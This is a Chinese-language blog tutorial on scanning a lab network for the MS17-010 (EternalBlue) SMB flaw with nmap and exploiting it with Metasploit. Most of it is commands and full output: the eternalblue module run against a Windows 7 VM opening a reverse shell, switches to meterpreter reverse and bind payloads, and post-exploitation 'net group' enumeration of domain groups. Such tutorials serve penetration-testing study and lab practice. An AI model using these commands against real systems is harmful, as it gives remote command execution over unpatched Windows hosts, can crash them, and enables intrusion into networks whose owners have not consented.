Mysticbinary

永恒之蓝(MS17-010)检测与利用

目录

利用Nmap检测

命令:

nmap -p445 --script smb-vuln-ms17-010 [IP]

# 如果运行报错,可以加个sudo

IP/24 = 8位地址范围,对应的子网掩码简单理解:

ip/24
11111111 11111111 11111111 00000000
2^8=256-2=254(台)

ip/16
11111111 11111111 00000000 00000000
2^16=65536-2=65534(台)

ip/8
11111111 00000000 00000000 00000000
2^24=16777216-2=16777214(台)

打印结果:
x.x.x.x/24 = x.x.x.1~255

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

从报告结果可以看出,内网中192.168.119.139这台主机存在ms-17-010漏洞;

MSF反弹SHELL

命令

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 【IP】
run

打印结果:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恒之蓝成功!但返回的只是一个cmdshell ;

因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload: set payload windows/x64/meterpreter/reverse_tcp
只要设置rhostsrport就OK了;

exploit 运行,这个时候就反弹的就是一个meterpreter会话 (更强的payload)。

使用正向的payload也是可以的:set payload windows/x64/meterpreter/bind_tcp

注意

有ms17_010漏洞的主机,一般都是旧版windows系统的主机,用攻击模块的时候,可能会导致主机的蓝屏宕机,所以需要谨慎一些。


乱码

有乱码都是因为编码不一致造成的;

成因:

  • Linux下面汉字默认是UTF-8编码
  • Windows下汉字使用的是GBK系列编码

解决方案:

  • Kali下先勾选GBK编码
C:\Windows\system32>net group
net group

\\ �����ʻ�

-------------------------------------------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
����������ϣ�������һ��������

chcp 65001

C:\Windows\system32>net group
net group

Group Accounts for \\

-------------------------------------------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

参考

https://cloud.tencent.com/developer/article/1541123
https://www.sqlsec.com/2018/03/smb.html

posted on 2020-04-24 14:10  Mysticbinary  阅读(2443)  评论(0编辑  收藏  举报

导航